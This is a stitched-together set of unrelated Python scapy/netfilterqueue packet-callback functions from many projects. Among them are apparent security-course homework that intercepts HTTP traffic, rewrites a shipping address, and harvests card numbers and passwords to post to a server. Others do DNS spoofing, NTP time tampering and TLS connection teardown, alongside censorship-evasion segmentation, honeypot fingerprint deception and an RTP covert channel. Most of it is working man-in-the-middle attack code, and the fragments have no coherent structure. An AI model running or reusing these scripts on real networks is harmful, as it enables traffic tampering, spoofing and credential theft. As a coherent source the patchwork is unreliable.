def exercise3_call_back_function(pkt): ''' This function is used by the exercise 3 function below to get the ip packets from raw payload. The exercise3 function recursively runs this function to solve exercise 3 Input : the intercepted raw payload Output: The token and staus code ''' url = 'http://com402.epfl.ch/hw1/ex3/shipping' # This is the url which we will use with request pkt.accept() # accept the packet (dont reject ot drop) payload = pkt.get_payload( ) # get the payload and store in variable payload ip = IP(payload) # create an IP packet from payload if ip.haslayer(TCP) == True and ip[TCP].dport == 80: assert ip[TCP].dport == 80 if ip.haslayer(Raw): #print (ip[Raw]) http = ip[Raw].load.decode() if "shipping" in http: print("yes") data_ = "{" + http.split( "{", 1)[1] # split the payload anf extrat json. # This implies in the payload only the response starting with { is needed. # This will correspond to where the json file starts. # A "{" was added in the expression because when we split from "{" in the payload, # The bracelet "{"" is excluded. But we need it to have a valid json format. # Hence, the need to add it back explicitly as "{" in the expression above data = json.loads(data_) # load the new json file data[ 'shipping_address'] = '*****@*****.**' # Here we replace the shipping address header = { "User-Agent": "Dumb Generator", "Host": "com402.epfl.ch", "Content-Type": "application/json", "Content-Length": "91" } # It is possible to extract the header too from payload but since the header from payload has no # " " double column , which is required for the request header format, this might amount to a for-loop computation # that might affect efficciency. The good thing is the header is not long so explicit declarationas above works well # to just construct a n #print (data) # Uncomment this to view data # Below we use the requests library to generate new packet, with the new json r = requests.post(url, data=json.dumps(data), headers=header) # The new json is response is provided as response below print("The token response: ") print(r.text) # We verify the status code is 200 = okay print("\n The status code: ") print(r.status_code)
def process_packet(packet): spkt = IP(packet.get_payload()) if spkt.haslayer(DNSRR): try: spkt = read_pkt(spkt) except IndexError: pass packet.set_payload(bytes(spkt)) if spkt.haslayer(HTTPRequest): print(spkt[Raw]) packet.accept()
def postcondition(packet): from scapy.all import IP pkt = IP(packet.get_payload()) if pkt.haslayer('IP'): del pkt['IP'].chksum del pkt['IP'].len if pkt.haslayer('TCP'): del pkt['TCP'].chksum if pkt.haslayer('ICMP'): del pkt['ICMP'].chksum pkt.show2() packet.raw = bytes(pkt) return packet
def tcp_segment(self, packet, logger): """ Segments a packet into two, given the size of the first packet (0:fragsize) Always returns two packets, since fragment is a branching action, so if we are unable to segment, it will duplicate the packet. """ if not packet.haslayer("TCP") or not hasattr( packet["TCP"], "load") or not packet["TCP"].load: return packet, packet.copy( ) # duplicate if no TCP or no payload to segment # Get the original payload and delete it from the packet so it # doesn't come along when copying the TCP layer payload = packet["TCP"].load del (packet["TCP"].load) fragsize = self.fragsize if self.fragsize == -1 or self.fragsize > len(payload) - 1: fragsize = int(len(payload) / 2) # Craft new packets pkt1 = IP(packet["IP"]) / payload[:fragsize] pkt2 = IP(packet["IP"]) / payload[fragsize:] # We cannot rely on scapy's native parsing here - if a previous action has changed the # fragment offset, scapy will not identify this as TCP, so we must do it for scapy if not pkt1.haslayer("TCP"): pkt1 = IP(packet["IP"]) / TCP(bytes(pkt1["IP"].load)) if not pkt2.haslayer("TCP"): pkt2 = IP(packet["IP"]) / TCP(bytes(pkt2["IP"].load)) packet1 = actions.packet.Packet(pkt1) packet2 = actions.packet.Packet(pkt2) # Reset packet2's SYN number packet2["TCP"].seq += fragsize del packet1["IP"].chksum del packet2["IP"].chksum del packet1["IP"].len del packet2["IP"].len del packet1["TCP"].chksum del packet2["TCP"].chksum del packet1["TCP"].dataofs del packet2["TCP"].dataofs if self.correct_order: return [packet1, packet2] else: return [packet2, packet1]
def rewrite(self, pkt): ip = IP(pkt) if ip.haslayer(DNS): iph = ip.getlayer(IP) udph = ip.getlayer(UDP) dns = ip.getlayer(DNS) if dns.qr == 0: # query record = { 'dst_ip': iph.dst, 'time': datetime.utcnow() } self.records[dns.id] = record self.logger.debug("rewriting DNS query: %s to %s" % (iph.dst, self.config['force_nameserver'])) iph.dst = self.config['force_nameserver'] elif dns.qr == 1: # answer self.logger.debug("found DNS answer: " + dns.summary()) record = self.records.get(dns.id, None) if record: self.logger.debug("rewriting DNS answer: %s to %s" % ( iph.src, record['dst_ip'])) iph.src = record['dst_ip'] del self.records[dns.id] del iph.chksum del udph.chksum del iph.len del udph.len return str(iph / udph / dns)
def print_and_accept(pkt): regex = re.compile("/ex4/") card_regex = re.compile("(\d{4})((\/|\.)\d{4}){3}") password_regex = re.compile("(pwd --- )([A-Z0-9:;<=>?@]{8,30})(\s)") pkt.accept() ip = IP(pkt.get_payload()) if ip["TCP"].dport == 80 and ip.haslayer("Raw"): http = ip["Raw"].load.decode() if regex.search(http): #print(ip.show()) #print(http) if card_regex.search(http): cc = card_regex.search(http).group() if cc not in return_list: return_list.append(cc) if password_regex.search(http): password = password_regex.search(http).group().split()[2] if password not in return_list: return_list.append(password) if len(return_list) >= 5: print(return_list) data = {"student_email": "*****@*****.**", "secrets": return_list} r = requests.post("http://com402.epfl.ch/hw1/ex4/sensitive", json=data) print(r.status_code) print(r.text)
def callback(nfq_pkt): pkt = IP(nfq_pkt.get_payload()) if pkt.haslayer(TCP): if not (seqgen_detect(nfq_pkt, pkt, cfg.fgrpt, cfg.service) or ecn_detect(nfq_pkt, pkt, cfg.fgrpt, cfg.service) or t2tot7_detect(nfq_pkt, pkt, cfg.fgrpt, cfg.service) or service_detect(nfq_pkt, pkt, cfg.fgrpt, cfg.service)): nfq_pkt.accept() elif pkt.haslayer(ICMP): if not icmp_detect(nfq_pkt, pkt, cfg.fgrpt): nfq_pkt.accept() elif pkt.haslayer(UDP): if not udp_detect(nfq_pkt, pkt, cfg.fgrpt): nfq_pkt.accept()
def print_and_accept(pkt): regex = re.compile("/ex3/shipping") pkt.accept() ip = IP(pkt.get_payload()) if ip["TCP"].dport == 80: if ip.haslayer("Raw"): http = ip["Raw"].load.decode() if regex.search(http): print("HTTP:") print(http) print("\nIP.show():") print(ip.show()) new_msg = json.loads(http.splitlines()[-1]) new_msg["shipping_address"] = "*****@*****.**" ip["Raw"].load = new_msg print("\nIP.show() nr. 2:") print(ip.show()) answer = requests.post("http://com402.epfl.ch/hw1/ex3/shipping", data=json.dumps(new_msg), headers={"Content-Type": "application/json"}) print("\nAnswer code:") print(answer.status_code) print("\nAnswer text:") print(answer.text)
def print_and_accept(pkt): payload = pkt.get_payload() # get the payload and store in variable payload ip = IP(payload) # create an IP packet from payload ###################### Get packer identities, to be used later ########################################## ip_src=ip.src # Src ip address ip_dst= ip.dst # destination ip address ip_dport = ip[TCP].dport # destination port ip_sport = ip[TCP].sport # src port ########################################################################################################## ################################# TLS packet identifiers################################################## TLSv1_2 = b'\x16\x03\x03' # identfier for TLS 1.2 handshake packet TLSv1_1 = b'\x16\x03\x02' # identifier for TLS 1.2 handshake packet ########################################################################################################## ################ Main Program LOgic for packet detection ################################################ ########### ******************Main IF LOCK ****************************************#######################################3 # checks if packet has raw and TCP poacket (2 conditions) if ip.haslayer(Raw) and ip.haslayer(TCP): tls_load = ip[Raw].load # get raw packet if TLSv1_2 in tls_load or TLSv1_1 in tls_load: pkt.drop() # drop packet of TLS v1.2 or 1.1 pkt_=IP(src=ip_dst , dst=ip_src) # Construct a new packet to send #####################FIN PACKET generation ################################### FIN=pkt_/TCP(sport=ip_dport, dport=ip_sport, flags="FA",seq= ip[TCP].ack,ack= ip[TCP].seq+1) # FIN packet with required port # In the implementation the src and dest address have been reversed. # This turns out to work especially in this solution. # A solution is also possible without it being reversed. ################# Send FIN packet #########################################33 sr1(FIN) # using sr1 instead of send ensures that the one waits for acknowledgement should be received ##################### And receipt of answer ################################## LASTACK = pkt_/TCP(sport=ip_dport, dport=ip_sport, flags="A",seq= ip[TCP].ack,ack= ip[TCP].seq+1) # ack packet send(LASTACK) # send ack packet ############################# else statementg to accêpt all other packets with RAW including TLSv1.0 ############################# else: pkt.accept()# äccept all other poacket ######## else for the main IF block ############################### ########********This accept TCP packet (packet without raw) *************########### else: pkt.accept()
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(DNSRR): try: scapy_packet = modify_packet(scapy_packet) except IndexError: pass packet.set_payload(bytes(scapy_packet)) packet.accept()
def callback(self, _, nfq_packet): # Get packetdata from nfqueue packet and build a Scapy packet pkt = IP(nfq_packet.get_data()) # check TCP packets if pkt.haslayer(TCP): check_TCP_probes(pkt, nfq_packet, self.os_pattern) # check ICMP packets elif pkt.haslayer(ICMP): check_ICMP_probes(pkt, nfq_packet, self.os_pattern) # check UDP packets elif pkt.haslayer(UDP): check_UDP_probe(pkt, nfq_packet, self.os_pattern) # don't analyse it, continue to destination else: forward_packet(nfq_packet) return 0
def callback(self, _, nfq_packet): # Get packetdata from nfqueue packet and build a Scapy packet pkt = IP(nfq_packet.get_data()) # check TCP packets if pkt.haslayer(TCP): check_TCP_probes(pkt, nfq_packet, self.os_pattern) # check ICMP packets elif pkt.haslayer(ICMP): check_ICMP_probes(pkt, nfq_packet, self.os_pattern) # check UDP packets elif pkt.haslayer(UDP): check_UDP_probe(pkt, nfq_packet, self.os_pattern) # don't analyse it, continue to destination else: forward_packet(nfq_packet) return 0
def callback(packet): payload = packet.get_payload() pkt = IP(payload) if (pkt.haslayer(DNSQR) and self.site in pkt[DNS].qd.qname): print("spoofing site") spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.new_site)) packet.set_payload(bytes(spoofed_pkt)) packet.accept()
def start(self, _, nfq_packet): # Get packetdata from nfqueue packet and build a Scapy packet pkt = IP(nfq_packet.get_data()) # check TCP packets if pkt.haslayer(TCP): try: check_TCP_probes(pkt, nfq_packet, self.OSPattern) except KeyboardInterrupt: print " Press Ctrl+C to exit" os.system('iptables -F') # check ICMP packets elif pkt.haslayer(ICMP): check_ICMP_probes(pkt, nfq_packet, self.OSPattern) # check UDP packets elif pkt.haslayer(UDP): check_UDP_probe(pkt, nfq_packet, self.OSPattern) # don't analyse it, continue to destination else: forward_packet(nfq_packet)
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(DNSRR): qname = scapy_packet[DNSQR].qname if args.target in qname.decode(): print("Spoofing target") answer = DNSRR(rrname=qname, rdata=args.new_ip) scapy_packet[DNS].an = answer scapy_packet[DNS].ancount = 1 del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[UDP].len del scapy_packet[UDP].chksum packet.set_payload(scapy_packet) # bytes(scapy_packet) packet.accept()
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(scapy.all.DNSRR): qname = scapy_packet[scapy.all.DNSQR].qname if b'bing.com' in qname: print("[+] Spoofing target.") answer = scapy.all.DNSRR(rrname=qname, rdata='1.1.1.1') scapy_packet[scapy.all.DNS].an = answer scapy_packet[scapy.all.DNS].ancount = 1 del scapy_packet[scapy.all.IP].len del scapy_packet[scapy.all.IP].chksum del scapy_packet[scapy.all.UDP].len del scapy_packet[scapy.all.UDP].chksum packet.set_payload(bytes(scapy_packet)) # print(scapy_packet.show()) # print(packet.get_payload()) packet.accept()
def callback(pkt): #qui ricevo il pacchetto e devo controllare se è rtp global first, last, ID, encr_msg, lastIndex packet = IP(pkt.get_payload()) pkt.drop() if ( packet.haslayer("UDP") and last == False and len(encr_msg) > 0 ): #il pacchetto ha udp, non è l'ultimo, la lunghezza del messaggio è > 0 rtp = RTP(packet["UDP"].payload) if (rtp.haslayer("Raw")): if (len(encr_msg) > 0 and len(rtp["Raw"].load) > 0): if (first == True): rtp["Raw"].load = b'\xbb\xbb' + rtp["Raw"].load[2:] first = False ID += 1 print(first) elif (ID < lastIndex and first == False): ind = format(ID, '#04x') if (len(ind) % 2 != 0): ind = ind[:2] + '0' + ind[2:] rtp["Raw"].load = bytes.fromhex( ind[2:]) + (rtp["Raw"].load)[2:] else: rtp["Raw"].load = bytes.fromhex( ind[2:]) + (rtp["Raw"].load)[1:] ID += 1 elif (ID == lastIndex): rtp["Raw"].load = b'\xbb\xbb' + (rtp["Raw"].load)[2:] last = True length = len(rtp["Raw"].load) chload = rtp["Raw"].load[length - 1:] chload, encr_msg = change(chload, encr_msg) rtp["Raw"].load = rtp["Raw"].load[:length - 1] + chload packet["UDP"].chksum = None packet["UDP"].payload = rtp #print((rtp["Raw"].load)[:2]) send(packet, verbose=False) if (last): stop() return first, last, ID, lastIndex
def callBack(self, packet): scapyPacket = IP(packet.get_payload()) if scapyPacket.haslayer(DNSRR): try: log.info(f'[original] { scapyPacket[DNSRR].summary()}') queryName = scapyPacket[DNSQR].qname if queryName in self.hostDict: scapyPacket[DNS].an = DNSRR( rrname=queryName, rdata=self.hostDict[queryName]) scapyPacket[DNS].ancount = 1 del scapyPacket[IP].len del scapyPacket[IP].chksum del scapyPacket[UDP].len del scapyPacket[UDP].chksum log.info(f'[modified] {scapyPacket[DNSRR].summary()}') else: log.info(f'[not modified] { scapyPacket[DNSRR].rdata }') except IndexError as error: log.error(error) packet.set_payload(bytes(scapyPacket)) return packet.accept()
def manipulate(self, package): pkt = IP(package.get_payload()) udp = pkt.getlayer(UDP) del pkt.chksum del pkt.len del udp.chksum del udp.len if pkt.haslayer(NTP): ntp = pkt.getlayer(NTP) else: ntp = NTP(pkt.load) # Timestamp to UTC time self.log("---------------------------------") self.log("[*] NTP packet:") self.log("---------------------------------") ref = self.ntp_system(ntp.ref) recv = self.ntp_system(ntp.recv) sent = self.ntp_system(ntp.sent) # Upgrade the year new_ref = self.upgrade(ref) new_recv = self.upgrade(recv) new_sent = self.upgrade(sent) # UTC time to timestamp ntp.recv = self.system_ntp(new_recv) ntp.sent = self.system_ntp(new_sent) ntp.ref = self.system_ntp(new_ref) package.set_payload(bytes(pkt)) #self.log('Packet !') self.log("Reference Timestamp : ") self.log("\t" + str(ref) + ' -> ' + str(datetime.datetime.fromtimestamp(new_ref))) self.log("Receive Timestamp : ") self.log("\t" + str(recv) + ' -> ' + str(datetime.datetime.fromtimestamp(new_recv))) self.log("Transmit Timestamp : ") self.log("\t" + str(sent) + ' -> ' + str(datetime.datetime.fromtimestamp(new_sent))) package.accept()
def callback(pkt): global first, last, todecrypt, index, dizionario packet = IP(pkt.get_payload()) pkt.accept() if (packet.haslayer("UDP") and last == False): rtp = RTP(packet["UDP"].payload) if (rtp.haslayer("Raw")): length = len(rtp["Raw"].load) if (length > 0 and rtp["Raw"].load[:1] == b'\xbb' and first == True): toapp = rtp["Raw"].load[length - 1:] todecrypt.extend(toapp) dizionario[0] = toapp first = False #print(index) elif (rtp["Raw"].load[:2] == b'\xbb\xbb' and first == False): print("LAST.") toapp = rtp["Raw"].load[length - 1:] dizionario[65535] = toapp last = True decrypt() elif (first == False and last == False): if (index >= 255): ind = rtp["Raw"].load[:2] #print(int(ind.hex(), 16)) #print(rtp["Raw"].load[length-1:]) else: ind = rtp["Raw"].load[:1] toapp = rtp["Raw"].load[length - 1:] dizionario[int(ind.hex(), 16)] = toapp #dizionario[index] = toapp index += 1 print("index: ", index) else: print("no layer Raw") return first, last, index, dizionario
#incoming_time = int.from_bytes(decrypted_payload[0:8], byteorder='big') #incoming_pkt = IP(decrypted_payload[8:]) incoming_pkt = IP(inbound_sidechannel_shaper.process_packet(sender, decrypted_payload)) incoming_pkt.src = localdb_ipmappings[sender] #Debug #timediff = abs(incoming_time - int(time.time() * 1000)) #sys.stderr.write("Incoming packet delayed by {} ms.\n".format(timediff)) #Assign the appropriate destination IP (this is a constant) incoming_pkt.dst = CONST_DST_IP #Recalculate the IPv4 checksum del incoming_pkt.chksum #If this carries a UDP packet recalculate the checksum from the new pseudoheader if incoming_pkt.haslayer(UDP): del incoming_pkt[UDP].chksum #If this carries a TCP packet recalculate the checksum from the new pseudoheader if incoming_pkt.haslayer(TCP): del incoming_pkt[TCP].chksum incoming_pkt = incoming_pkt.__class__(bytes(incoming_pkt)) #Send it over to Socat sys.stdout.buffer.write(socat_format(incoming_pkt)) sys.stdout.buffer.flush()
def exercise4_call_back_function(pkt): ''' This function is used by the exercise 4 function below to get the ip packets from raw payload. The exercise4 function recursively runs this function to solve exercise 4 As part of the analysis the output of the print is piped to a text file and the sensitive data is carefully spotted. Input : the intercepted raw payload Output: The token and staus code ''' url = 'http://com402.epfl.ch/hw1/ex4/sensitive' # This is the url which we will use with request pkt.accept() # accept raw packet payload = pkt.get_payload() # get the payload of raw packet #print(k) ip = IP(payload) # create an ip packet if ip.haslayer(TCP) == True and ip[TCP].dport == 80: assert ip[TCP].dport == 80 if ip.haslayer(Raw): #print (ip[Raw]) http = ip[Raw].load.decode() #print(http.lstrip(' ')) # uncomment this to see the output. One possibility is to pipe the output to text file when this is uncommented # this enables carful reading of sensitive information # we create the new json file for the payload/sensitive data and header data = { "student_email": "*****@*****.**", "secrets": [ "5370/2586/7638/8964", "0470.5684.7704.8295", "7968/7126/0501/8790", "W;PGR5E@SU1X>", "=X5AN>?YN419PA" ] } header = { "User-Agent": "Dumb Generator", "Host": "com402.epfl.ch", "Content-Type": "application/json", "Content-Length": "452" } # post a request using payload and headr try: r = requests.post(url, data=json.dumps(data), headers=header) # The new response is provided as response below print("The token response: ") print(r.text) # We verify the status code is 200 = okay print("\n The status code: ") print(r.status_code) print("\n") except KeyboardInterrupt: pass
def tcp_segment(self, packet, logger): """ Segments a packet into two, given the size of the first packet (0:fragsize) Always returns two packets, since fragment is a branching action, so if we are unable to segment, it will duplicate the packet. If overlap is specified, it will select n bytes from the second packet and append them to the first, and increment the sequence number accordingly """ if not packet.haslayer("TCP") or not hasattr( packet["TCP"], "load") or not packet["TCP"].load: return packet, packet.copy( ) # duplicate if no TCP or no payload to segment # Get the original payload and delete it from the packet so it # doesn't come along when copying the TCP layer payload = packet["TCP"].load del (packet["TCP"].load) fragsize = self.fragsize if self.fragsize == -1 or self.fragsize > len(payload) - 1: fragsize = int(len(payload) / 2) # Craft new packets # Make sure we don't go out of bounds by choosing the min overlap_bytes = min(len(payload[fragsize:]), self.overlap) # Attach these bytes to the first packet pkt1 = IP(packet["IP"]) / payload[:fragsize + overlap_bytes] pkt2 = IP(packet["IP"]) / payload[fragsize:] # We cannot rely on scapy's native parsing here - if a previous action has changed the # fragment offset, scapy will not identify this as TCP, so we must do it for scapy if not pkt1.haslayer("TCP"): pkt1 = IP(packet["IP"]) / TCP(bytes(pkt1["IP"].load)) if not pkt2.haslayer("TCP"): pkt2 = IP(packet["IP"]) / TCP(bytes(pkt2["IP"].load)) packet1 = layers.packet.Packet(pkt1) packet2 = layers.packet.Packet(pkt2) # Reset packet2's SYN number if packet2["TCP"].seq + fragsize > MAX_UINT: # Wrap sequence numbers around if greater than MAX_UINT packet2["TCP"].seq = packet2["TCP"].seq + fragsize - MAX_UINT - 1 else: packet2["TCP"].seq += fragsize del packet1["IP"].chksum del packet2["IP"].chksum del packet1["IP"].len del packet2["IP"].len del packet1["TCP"].chksum del packet2["TCP"].chksum del packet1["TCP"].dataofs del packet2["TCP"].dataofs if self.correct_order: return [packet1, packet2] else: return [packet2, packet1]
def handle_packet(nfq_packet): try: pkt = IP(nfq_packet.get_payload()) except: forward_packet(nfq_packet) return 0 if pkt[IP].dst == '127.0.0.1': forward_packet(nfq_packet) return 0 virtDevices = getVirtualDevices() # Get Dict of virtual devices if pkt[IP].dst in virtDevices.keys( ): # Check if the Packet is intended for any of the virtual devices fgrpt = virtDevices[pkt[ IP].dst].cfg.fgrpt # Get the OS Fingerprint of the virtual device mac = virtDevices[ pkt[IP].dst].macAddr # Get the MAC Address of the Virtual Device services = virtDevices[ pkt[IP].dst].cfg.service # Get the Services of the virtual device device_name = virtDevices[ pkt[IP].dst].name # Get the Name of the virtual device if pkt.haslayer(TCP): port = pkt[TCP].dport elif pkt.haslayer(UDP): port = pkt[UDP].dport else: port = 0 try: parse_data = base64.encodebytes( nfq_packet.get_payload()).decode('ascii') data = { 'timestamp': time.time(), 'dst_ip': pkt[IP].dst, 'host_os': device_name, 'src_ip': pkt[IP].src, 'services': port, 'packet': parse_data } gc.LOG_PACKET.info(json.dumps(data)) except Exception as e: print('Why?!' + str(e)) else: forward_packet( nfq_packet ) # If packet not intended for the virtual devices, then forward it return 0 # Check if the packet layer is TCP if pkt.haslayer(TCP): if not (seqgen_detect(nfq_packet, pkt, fgrpt, mac, gc.SOCKET_INTERFACE) or ecn_detect(nfq_packet, pkt, fgrpt, mac, gc.SOCKET_INTERFACE) or t2tot7_detect(nfq_packet, pkt, fgrpt, mac, gc.SOCKET_INTERFACE) or service_detect(nfq_packet, pkt, fgrpt, mac, services, gc.SOCKET_INTERFACE)): forward_packet(nfq_packet) # Check if the packet layer is ICMP elif pkt.haslayer(ICMP): if not icmp_detect(nfq_packet, pkt, fgrpt, mac, gc.SOCKET_INTERFACE): forward_packet(nfq_packet) # Check if the packet layer is UDP elif pkt.haslayer(UDP): if not udp_detect(nfq_packet, pkt, fgrpt, mac, gc.SOCKET_INTERFACE): forward_packet(nfq_packet) # Don't analyse the packet, let it continue to destination else: forward_packet(nfq_packet) return 0